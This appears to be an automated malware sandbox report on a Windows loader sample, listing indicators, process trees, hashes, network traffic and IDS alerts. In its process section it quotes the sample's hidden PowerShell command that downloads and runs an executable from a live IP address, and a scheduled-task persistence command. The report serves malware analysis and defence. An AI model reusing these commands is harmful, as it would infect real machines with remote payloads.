File name:

LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828

Full analysis: https://app.any.run/tasks/40965836-4407-46f1-b219-093b95e37ce7
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 17, 2025, 01:18:29
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

BFF537F368CF413F3D6D6D9481B1ED50

SHA1:

94E4CBE94FF75A61ECD488FDA24D3A912AF17C3D

SHA256:

A3E7F1BA520DFBD12254F71AFF326E6B259DD00B8D147D60B08B4E93B43F8EB5

SSDEEP:

49152:ePPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtB7Xo:8P/mp7t3T4+B/btosJwIA4hHmZlKH2T/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7392)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Starts CMD.EXE for commands execution

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Manipulates environment variables

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Starts process via Powershell

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)

    • Probably download files using WebClient

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)

    • Connects to the server without a host name

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

  • INFO

    • The sample compiled with english language support

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Reads mouse settings

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Checks supported languages

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Create files in a temporary directory

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Reads the computer name

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)

    • Auto-launch of the file from Task Scheduler

      • cmd.exe (PID: 7392)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)

    • Manual execution by a user

      • mshta.exe (PID: 7724)

    • Disables trace logs

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Checks proxy server information

      • powershell.exe (PID: 7560)
      • slui.exe (PID: 8180)
      • powershell.exe (PID: 7796)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)

    • Reads the software policy settings

      • slui.exe (PID: 8180)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:16 14:39:34+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
11
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start lia_intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe no specs cmd.exe no specs conhost.exe no specs mshta.exe no specs schtasks.exe no specs powershell.exe conhost.exe no specs mshta.exe no specs powershell.exe conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
7372"C:\Users\admin\Desktop\LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe" C:\Users\admin\Desktop\LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\lia_intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
7392C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn nTkyYmaq4Wc /tr "mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\cmd.exeLIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7400\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7416mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.htaC:\Windows\SysWOW64\mshta.exeLIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7476schtasks /create /tn nTkyYmaq4Wc /tr "mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta" /sc minute /mo 25 /ru "admin" /fC:\Windows\SysWOW64\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
7560"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
7568\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7724mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.htaC:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
7796"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7804\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
13 733
Read events
13 713
Write events
20
Delete events
0

Modification events

(PID) Process:(7416) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7416) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7416) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7724) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7724) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7724) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7560) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(7560) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(7560) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(7560) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
Executable files
0
Suspicious files
1
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
7372LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exeC:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.htahtml
MD5:AAA3AB1A36F7B5CC74BE535A6431DCA8
SHA256:AA57F85EFA407426DA8485055B33051D1D7A940DBB3F4CDF92C4AC2FE077C4EB
7560powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w0tcd0uq.rgx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7560powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:28814BB08523A9F7C669B65F75F567FE
SHA256:BCE88EBE00BCCCE03BC595F7BB9B44E9001D94AEA2B97C8E3E16BE52C4BFFA76
7796powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dvdjeqky.r4j.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7796powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kdieybj0.ajx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7560powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wzqovyhm.0yu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
26
DNS requests
3
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7560
powershell.exe
GET
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
7560
powershell.exe
GET
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
7796
powershell.exe
GET
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
7796
powershell.exe
GET
185.156.72.2:80
http://185.156.72.2/testmine/random.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7560
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
7796
powershell.exe
185.156.72.2:80
Tov Vaiz Partner
RU
unknown
4
System
192.168.100.255:137
whitelisted
7252
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
8180
slui.exe
40.91.76.224:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.174
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID
Process
Class
Message
7560
powershell.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 34
7560
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7796
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7560
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
7796
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828